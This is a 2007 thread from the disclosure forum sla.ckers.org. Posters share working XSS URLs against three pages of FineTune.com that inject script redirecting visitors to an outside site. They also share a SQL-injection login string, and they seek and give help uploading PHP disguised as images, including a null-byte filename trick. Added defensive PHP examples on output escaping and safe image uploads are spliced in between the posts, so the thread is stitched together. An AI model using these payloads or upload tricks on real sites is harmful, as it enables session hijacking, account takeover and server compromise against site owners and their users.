Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Fine Tune XSS Holes, And Need Further Assistance
Date: March 13, 2007 10:38AM

I was looking at FineTune.com's Wii music player, but I was on the computer, and just figured I'd check out the packets I was getting from the site to see if anything could be played with.

Their artist search:
http://www.finetune.com/api/search.php?type=artist&term=<script>alert('XSS');location.href='http://www.awesomeandrew.net/';</script>&n=100&start=0&u=58AD5586C1E347828E618A80901DC04F&t=F450253AE98942E48618C55D2F6D5AFD

Their artist song menu on the main page:
http://www.finetune.com/content/artistRadio.php?st="><script>alert('XSS');location.href='http://www.awesomeandrew.net/';</script>

Their sign-in page:
http://www.finetune.com/content/signin.php?u="><script>alert('XSS');location.href='http://www.awesomeandrew.net/';</script>#

Their login page is vulnerable to some form of SQL injection, but I don't play around with SQL enough to really want to bother. It's possible to login to a non-existent account with the usual: a' or 'a'='a'/*

I tried to inject a small amount of PHP into their image uploading areas, but PHP isn't my strong point. I received errors on both the playlist image and user image uploads. Perhaps someone can use this information to form some kind of image to bypass their functions. If it helps, here's an example from when I tried to end their upload function.

Warning: getimagesize() [function.getimagesize]: Read error! in D:\www\profileImg_id.php on line 58

Warning: getimagesize() [function.getimagesize]: Read error! in D:\www\profileImg_id.php on line 59

Warning: imagecopyresampled(): supplied argument is not a valid Image resource in D:\www\profileImg_id.php on line 162

Warning: imagecopyresampled(): supplied argument is not a valid Image resource in D:\www\profileImg_id.php on line 173

Warning: imagedestroy(): supplied argument is not a valid Image resource in D:\www\profileImg_id.php on line 180

Warning: Cannot modify header information - headers already sent by (output started at D:\www\profileImg_id.php:58) in D:\www\profileImg_id.php on line 185


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/
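The three URLs above are the same bug in three places: a GET parameter echoed into the page without encoding. The following is an added example, not FineTune's code and not from the post, showing the vulnerable pattern beside the fix for the contexts the payloads target (HTML body for `term`, an attribute for `st` and `u`, and a JSON reply for an `/api/` endpoint). The parameter names mirror the URLs in the post; how FineTune actually renders them is an assumption.

```php
<?php
// Added example (not FineTune's code): reflected XSS from an unencoded
// query parameter, and the context-specific fix. Parameter names (term, st)
// come from the URLs in the post; the markup around them is assumed.

declare(strict_types=1);

// Vulnerable: term=<script>...</script> lands in the markup verbatim and
// runs in the victim's browser.
function render_search_vulnerable(string $term): string
{
    return "<h2>Results for $term</h2>";
}

// One encoder for both HTML body and attribute contexts. ENT_QUOTES also
// encodes ' and ", which is what stops the "> attribute break-out used in
// the artistRadio.php?st= and signin.php?u= payloads.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_search_safe(string $term): string
{
    return '<h2>Results for ' . html_escape($term) . '</h2>';
}

// Attribute context: the attribute is quoted, the URL component is
// percent-encoded, and the result is HTML-encoded on top of that.
function render_station_link_safe(string $st): string
{
    return '<a href="artistRadio.php?st=' . html_escape(rawurlencode($st)) . '">'
         . html_escape($st) . '</a>';
}

// API context (search.php lives under /api/): send a non-HTML content type
// and let json_encode do the escaping. The JSON_HEX_* flags turn < > & ' "
// into \uXXXX so the body stays inert even if a browser sniffs it as HTML.
function render_search_json(string $term, array $artists): string
{
    header('Content-Type: application/json; charset=UTF-8');
    header('X-Content-Type-Options: nosniff');
    return json_encode(
        ['term' => $term, 'artists' => $artists],
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
}

// Constructed payloads of the same shape as those in the post.
$body_payload = "<script>alert('XSS')</script>";
$attr_payload = '"><script>alert(1)</script>';

echo render_search_vulnerable($body_payload), PHP_EOL;   // script tag survives
echo render_search_safe($body_payload), PHP_EOL;         // &lt;script&gt;...
echo render_station_link_safe($attr_payload), PHP_EOL;   // quotes encoded, no break-out
```

The encoder must match the output context: `htmlspecialchars` is correct for HTML body and quoted attributes, but not for a value dropped into a `<script>` block or an unquoted attribute, and the `/api/` endpoint should not be returning HTML at all.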

Re: Fine Tune XSS Holes, And Need Further Assistance
Posted by: trev
Date: March 13, 2007 12:10PM

No SQL injection there, they will simply show you a blank page if you use ' in the user name but you are not logged in. Guess it is a precautionary measure.

Edit: You could probably upload this image and use it as XSS for IE users.
Edit2: On the other hand, "imagecopyresampled" probably means that they will convert this image and remove any comments while doing so.



Edited 3 time(s). Last edit at 03/13/2007 12:18PM by trev.

Re: Fine Tune XSS Holes, And Need Further Assistance
Date: March 14, 2007 12:37AM

Thanks. I wasn't sure about the SQL injection as I don't use it. I've read many injection articles to learn about it, but never physically used SQL.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Fine Tune XSS Holes, And Need Further Assistance
Posted by: jungsonn
Date: March 15, 2007 08:44AM

It seems they read the image and build a thumbnail from it with imagecopyresampled(); most of the time they make it a little smaller by resampling the image.

Have you tried to insert nulls?

like: c:\desktop\image.php%00.jpg

I guess that won't work because they are running some image checks, but you can try to upload PHP files as JPGs. Sometimes it works.
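The warnings in the first post tell a story: getimagesize() failed, the script carried on anyway, and imagecopyresampled() ran on a resource that was never created, all before the redirect header. The handler below is an added example, not FineTune's code and not from this thread, of doing the same thumbnailing (validate with getimagesize(), resample into a fresh canvas) while stopping at the first failure, ignoring the client-supplied filename entirely, and choosing the stored name and extension on the server. The `$_FILES['img']` field name, the upload directory, and the redirect target are assumptions; it also assumes the upload directory is served as static files with PHP execution disabled.

```php
<?php
// Added example (not FineTune's code): image upload that re-encodes the
// file and never trusts the client's filename. Field name 'img', the
// uploads directory and the redirect target are assumptions.

declare(strict_types=1);

const MAX_BYTES  = 2 * 1024 * 1024;
const THUMB_SIZE = 128;
const UPLOAD_DIR = __DIR__ . '/uploads';   // assumed: static files only, no PHP execution here

function process_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])
        || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('upload rejected');
    }

    // Validate by content. The client's name (image.php%00.jpg, a .php file
    // renamed to .jpg) is never consulted, so there is no extension check
    // to trick. Stop here on failure instead of falling through to the GD
    // calls with a false value, which is what produced the warnings above.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false) {
        throw new RuntimeException('not an image');
    }
    [$w, $h, $type] = $info;
    if ($w < 1 || $h < 1) {
        throw new RuntimeException('bad dimensions');
    }

    switch ($type) {
        case IMAGETYPE_JPEG: $src = @imagecreatefromjpeg($file['tmp_name']); break;
        case IMAGETYPE_PNG:  $src = @imagecreatefrompng($file['tmp_name']);  break;
        case IMAGETYPE_GIF:  $src = @imagecreatefromgif($file['tmp_name']);  break;
        default: throw new RuntimeException('unsupported image type');
    }
    if ($src === false) {
        throw new RuntimeException('decode failed');
    }

    // Resample into a new canvas: only pixel data survives, so comment
    // blocks, EXIF and anything appended after the image data are dropped.
    $scale = min(THUMB_SIZE / $w, THUMB_SIZE / $h, 1);
    $tw = max(1, (int) round($w * $scale));
    $th = max(1, (int) round($h * $scale));
    $dst = imagecreatetruecolor($tw, $th);
    if ($dst === false || !imagecopyresampled($dst, $src, 0, 0, 0, 0, $tw, $th, $w, $h)) {
        imagedestroy($src);
        throw new RuntimeException('resample failed');
    }
    imagedestroy($src);

    // Server-chosen name and extension, always written as JPEG.
    $name = bin2hex(random_bytes(16)) . '.jpg';
    $path = UPLOAD_DIR . '/' . $name;
    $ok = imagejpeg($dst, $path, 85);
    imagedestroy($dst);
    if (!$ok) {
        throw new RuntimeException('write failed');
    }
    return $name;
}

// Entry point: any failure is caught before output starts, so the redirect
// header can always be sent and no warning (or path like D:\www\...) leaks.
try {
    $name = process_upload($_FILES['img'] ?? []);
    header('Location: /profile.php?img=' . rawurlencode($name));
} catch (RuntimeException $e) {
    http_response_code(400);
    header('Content-Type: text/plain; charset=UTF-8');
    echo 'Upload failed: ', $e->getMessage();
}
```

Two things the original clearly did not do: check the return value of getimagesize() before using it, and keep `display_errors` off in production so a failed upload does not print the server's filesystem layout. Re-encoding defeats the "PHP inside a JPEG" approach only if the stored file can never be interpreted as PHP, which is why the upload directory's execution policy is part of the fix rather than an afterthought.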

Re: Fine Tune XSS Holes, And Need Further Assistance
Posted by: FR3DC3RV
Date: March 15, 2007 12:22PM

It's strange, but I managed to do SQL injection.
I inserted:
Username: 'a
Password: 'a

And I logged into a blank account.
Very strange.

-------------------------------
http://fr3dc3rv.blogspot.com

Re: Fine Tune XSS Holes, And Need Further Assistance
Posted by: trev
Date: March 15, 2007 01:13PM

FR3DC3RV, see above - this isn't really SQL injection. If you have an ' in the user name they make it appear like you logged in, probably just to waste your time.

Re: Fine Tune XSS Holes, And Need Further Assistance
Date: March 15, 2007 02:56PM

Perhaps it's just some form of an error? I had the same result, and attempted to utilize their functions, but couldn't.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/
